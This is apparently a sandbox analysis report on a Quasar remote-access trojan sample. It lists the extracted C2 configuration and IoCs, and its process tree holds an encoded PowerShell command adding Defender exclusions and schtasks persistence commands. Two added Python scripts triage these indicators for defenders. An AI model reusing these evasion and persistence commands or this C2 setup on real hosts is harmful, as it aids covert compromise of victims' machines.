Analysis

max time kernel: 126s
max time network: 139s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 09/01/2023, 14:25

Static task: static1
Behavioral task: behavioral1
Sample: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Resource: win7-20220812-en
General

Target: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Size: 354KB
MD5: 8b54bcaf180119658155a1ba2909f082
SHA1: 7813044ffe233a79eb5937e6affcfbc365427fc1
SHA256: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
SHA512: fb9f1fe603c69a27c1fbf40067be9ef3273a791a40e8f262d98e2c16dcd1c6ecc36f359f1a8119532a078e0ba8f4065dc2ef44a1282d9b2f41578551ab8f6fd8
SSDEEP: 6144:XbRHhzisehcChBB6aQaAIybtbJpHgxwkeDBWeSXpU+PtL11J//LbwDJQHgYCBfuB:Xb/Shzn4tbPAGkeLatL11J//LUDaAY2C
Malware Config

Extracted
family: quasar
version: 1.3.0.0
tag: Office04 (the Quasar builder's default tag)
c2: 192.168.0.125:4782
c2: AeroNaut-25032.portmap.io:25032
mutex: QSR_MUTEX_e22Aj87Wn2XuKgDxxw
encryption_key: s8zrhKuw28Jjzjqpd6lo
install_name: Java.exe
log_directory: Logs
reconnect_delay: 3000 (ms)
startup_key: JavaStartup
subdirectory: SubDir

Notes on the config: the first C2 is an RFC 1918 address, reachable only on the operator's own network, so the Internet-facing C2 is the portmap.io port-forwarding hostname; the upstream address behind that relay is not visible from the sample. install_name and subdirectory give the install path seen in the process tree, C:\Program Files (x86)\SubDir\Java.exe, and startup_key is the name of the persistence entry. Quasar 1.3 creates a scheduled task with that name only when it runs with administrative rights (as it did in this sandbox); otherwise it writes a Run value of the same name under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, so on a non-admin host check the registry rather than the task list.
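Added example, not part of the Triage report or of Quasar itself: a small enrichment step for the extracted C2 list. It splits each entry into host and port, uses the standard library to tell internal-only addresses from public ones, and flags hostnames on tunnelling services so the analyst blocks the relay name rather than chasing an IP. The RELAY_SUFFIXES list is an assumption for this example; extend it from your own telemetry.

```python
import ipaddress

# C2 entries copied from the extracted Quasar config above.
QUASAR_C2 = ["192.168.0.125:4782", "AeroNaut-25032.portmap.io:25032"]

# Port-forwarding / tunnelling services that give a NATed operator a public
# hostname. Assumed list for this example, not from the report.
RELAY_SUFFIXES = (".portmap.io", ".ngrok.io", ".serveo.net")


def split_host_port(entry: str):
    """Split 'host:port' from the right so IPv6-looking hosts are not mangled."""
    host, sep, port = entry.rpartition(":")
    if not sep or not port.isdigit():
        raise ValueError(f"malformed c2 entry: {entry!r}")
    return host, int(port)


def classify_c2(entry: str) -> dict:
    """Classify one C2 endpoint: internal (unreachable from the Internet), public IP,
    relay hostname on a tunnelling service, or plain hostname."""
    host, port = split_host_port(entry)
    info = {"host": host, "port": port}
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            info["scope"] = "internal"      # lab/test build or LAN-only operator
        else:
            info["scope"] = "public-ip"
        info["block_on"] = str(ip)
    elif host.lower().endswith(RELAY_SUFFIXES):
        info["scope"] = "relay"             # upstream address unknown and may change
        info["block_on"] = host.lower()
    else:
        info["scope"] = "hostname"
        info["block_on"] = host.lower()
    return info


def actionable_network_iocs(entries) -> list:
    """Indicators worth pushing to perimeter blocks; internal-only C2s are dropped
    because blocking 192.168.x.x at the edge achieves nothing."""
    return [c["block_on"] for c in map(classify_c2, entries) if c["scope"] != "internal"]


if __name__ == "__main__":
    for entry in QUASAR_C2:
        print(classify_c2(entry))
    print("block:", actionable_network_iocs(QUASAR_C2))
```

For this sample the only indicator that survives the filter is the portmap.io hostname; the 192.168.0.125 entry is useful for attribution (it says where the operator tested the build) but not for blocking.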
Signatures

Quasar payload (8 IoCs)
  resource | yara_rule
  behavioral1/files/0x0007000000015c29-60.dat | family_quasar
  behavioral1/files/0x0007000000015c29-63.dat | family_quasar
  behavioral1/files/0x0007000000015c29-64.dat | family_quasar
  behavioral1/memory/820-65-0x0000000000170000-0x00000000001CE000-memory.dmp | family_quasar
  behavioral1/files/0x0007000000015c60-70.dat | family_quasar
  behavioral1/files/0x0007000000015c60-72.dat | family_quasar
  behavioral1/files/0x0007000000015c60-73.dat | family_quasar
  behavioral1/memory/1996-74-0x0000000000010000-0x000000000006E000-memory.dmp | family_quasar

Executes dropped EXE (2 IoCs)
  pid | Process
  820 | Client-built.exe
  1996 | Java.exe

Loads dropped DLL (2 IoCs)
  pid | Process
  1088 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
  820 | Client-built.exe

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  1 | ip-api.com

Drops file in Program Files directory (4 IoCs)
  description | ioc | Process
  File created | C:\Program Files (x86)\SubDir\Java.exe | Client-built.exe
  File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | Client-built.exe
  File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | Java.exe
  File opened for modification | C:\Program Files (x86)\SubDir | Java.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (This is the sandbox's generic description for the signature. Quasar's file manager enumerates drives, so for this sample the hit is ordinary RAT functionality, not evidence of ransomware.)

Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  668 | schtasks.exe
  2012 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  304 | powershell.exe
  932 | powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 304 | powershell.exe
  Token: SeDebugPrivilege | 932 | powershell.exe
  Token: SeDebugPrivilege | 820 | Client-built.exe
  Token: SeDebugPrivilege | 1996 | Java.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid | Process
  1996 | Java.exe
  (A Windows hook installed by the persisted client; Quasar ships a keylogger, which is the usual reason this signature fires for the family.)

Suspicious use of WriteProcessMemory (27 IoCs; identical rows collapsed, number of rows in the last column)
  description | pid | Process | procid_target | rows
  PID 1088 wrote to memory of 304 | 1088 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 27 | 4
  PID 1088 wrote to memory of 932 | 1088 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 29 | 4
  PID 1088 wrote to memory of 820 | 1088 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 31 | 4
  PID 820 wrote to memory of 668 | 820 | Client-built.exe | 33 | 4
  PID 820 wrote to memory of 1996 | 820 | Client-built.exe | 35 | 7
  PID 1996 wrote to memory of 2012 | 1996 | Java.exe | 36 | 4
  (Every write targets a process the writer itself had just spawned, which is the pattern ordinary process creation produces in this sandbox; there is no write into a pre-existing foreign process, so this is not evidence of injection.)
Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe  (PID 1088)
  command line: "C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 304)
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 932)
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\Client-built.exe  (PID 820)
    command line: "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\schtasks.exe  (PID 668)
      command line: "schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f
      - Creates scheduled task(s)

    C:\Program Files (x86)\SubDir\Java.exe  (PID 1996)
      command line: "C:\Program Files (x86)\SubDir\Java.exe"
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\schtasks.exe  (PID 2012)
        command line: "schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f
        - Creates scheduled task(s)

Notes on the tree: the PowerShell and schtasks images sit under SysWOW64 although the command lines name System32, because the 32-bit dropper (see the arch:x86 resource tag) is subject to WOW64 file-system redirection. The -EncodedCommand value of PID 932 is base64 of UTF-16LE text and decodes to an Add-MpPreference call that adds Microsoft Defender exclusions for $env:UserProfile and $env:SystemDrive, with short <#...#> comment blocks inserted between the tokens to break string matching; the Defender PowerShell module is not present on the Windows 7 image used here, so that step is inert in this run but would matter on a Windows 10/11 target. The two schtasks calls create the same task name, JavaStartup, and both pass /f, so the second call, issued by the copy in Program Files (x86), silently replaces the first: the persistence that survives points at C:\Program Files (x86)\SubDir\Java.exe, run at every logon with highest privileges.
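Added example, not part of the Triage report or of Quasar itself: a triage pass over the child command lines above that decodes the PowerShell -EncodedCommand argument, strips the <#...#> comment padding, pulls out the Defender exclusion paths, parses the two schtasks /create lines into their flags, and resolves which action the JavaStartup task ends up with after the /f overwrite. The command lines are copied from the tree (PID 304's argument is not reproduced in this report, so it is left out); the findings rules, including the user-temp-directory heuristic, are this example's own and are assumptions, not sandbox signatures.

```python
import base64
import re

# Child command lines copied from the process tree above, in tree order.
CHILD_CMDLINES = {
    932: r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="',
    668: r'"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f',
    2012: r'"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f',
}

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')          # quoted argument or bare word
_BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script, not UTF-8."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> comments and collapse the whitespace they leave behind."""
    return " ".join(_BLOCK_COMMENT.sub(" ", script).split())


def defender_exclusions(script: str) -> list:
    """Paths given to Add-MpPreference -ExclusionPath, either one value or an @(...) array.
    Returned as written; $env: references are not expanded."""
    m = re.search(r"Add-MpPreference\b.*?-ExclusionPath\s+(?:@\(([^)]*)\)|(\S+))",
                  strip_block_comments(script), re.IGNORECASE)
    if not m:
        return []
    inner = m.group(1) if m.group(1) is not None else m.group(2)
    return [p.strip().strip("'\"") for p in inner.split(",") if p.strip()]


def parse_schtasks_create(tokens: list) -> dict:
    """Collect /tn /sc /tr /rl and /f from a 'schtasks /create' token list."""
    if len(tokens) < 2 or tokens[1].lower() != "/create":
        return {}
    task = {"force": False}
    i = 2
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/f":
            task["force"] = True
            i += 1
        elif flag in ("/tn", "/sc", "/tr", "/rl") and i + 1 < len(tokens):
            task[flag[1:]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return task


def triage(pid: int, cmdline: str) -> list:
    """Human-readable findings for one child command line (rules are this example's own)."""
    tokens = tokenize(cmdline)
    lowered = [t.lower() for t in tokens]
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    findings = []
    if image == "powershell.exe" and "-encodedcommand" in lowered:
        script = strip_block_comments(decode_encoded_command(tokens[lowered.index("-encodedcommand") + 1]))
        findings.append(f"pid {pid}: decoded script: {script}")
        excl = defender_exclusions(script)
        if excl:
            findings.append(f"pid {pid}: Defender exclusions added for {', '.join(excl)}")
    elif image in ("schtasks", "schtasks.exe"):
        task = parse_schtasks_create(tokens)
        if task.get("sc", "").upper() == "ONLOGON" and task.get("rl", "").upper() == "HIGHEST":
            findings.append(f"pid {pid}: task {task['tn']!r} runs {task['tr']} at every logon with highest privileges")
        if "\\appdata\\local\\temp\\" in task.get("tr", "").lower():
            findings.append(f"pid {pid}: task action lives in the user temp directory")
        if task.get("force"):
            findings.append(f"pid {pid}: /f silently replaces any existing task named {task['tn']!r}")
    return findings


def final_task_actions(cmdlines: dict) -> dict:
    """Which action each task name ends up with once later /f creates overwrite earlier ones
    (dict insertion order is taken as execution order)."""
    actions = {}
    for cmd in cmdlines.values():
        task = parse_schtasks_create(tokenize(cmd))
        if task.get("tn"):
            actions[task["tn"]] = task.get("tr")
    return actions


if __name__ == "__main__":
    for pid, cmd in CHILD_CMDLINES.items():
        for line in triage(pid, cmd):
            print(line)
    print("surviving persistence:", final_task_actions(CHILD_CMDLINES))
```

The decode step is the one most worth keeping: a UTF-8 decode of the same blob yields NUL-interleaved text, and string signatures written against the raw base64 are defeated by the comment padding, which is why the check runs on the stripped script rather than on the argument.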
Downloads
(dropped file; the report records no path for it. It is listed six times, matching the six family_quasar file hits under Signatures, so it is most likely the Quasar client written as Client-built.exe and copied to Java.exe; duplicates collapsed.)
Filesize: 348KB
MD5: c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1: 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256: 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512: 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
(a Windows jump-list file, an execution artifact rather than a dropped payload)
Filesize: 7KB
MD5: 09491f53829b6a3bab13fb0e98fab068
SHA1: 815480a0cf434ac34ddd7bc031066ed14687395c
SHA256: 257644182d9199a83598c76c73f9418ad4697c585e3192fedaaee8332710cc23
SHA512: dd487a30ad1fe189b9fc4cbc4db2df23c0ecc0b259f5c3209c1ba85f8646f1c615ca0a2567af1dfe5efccae8227b4eb592aca7b9b9a3668dc7ccfa3e54e81adc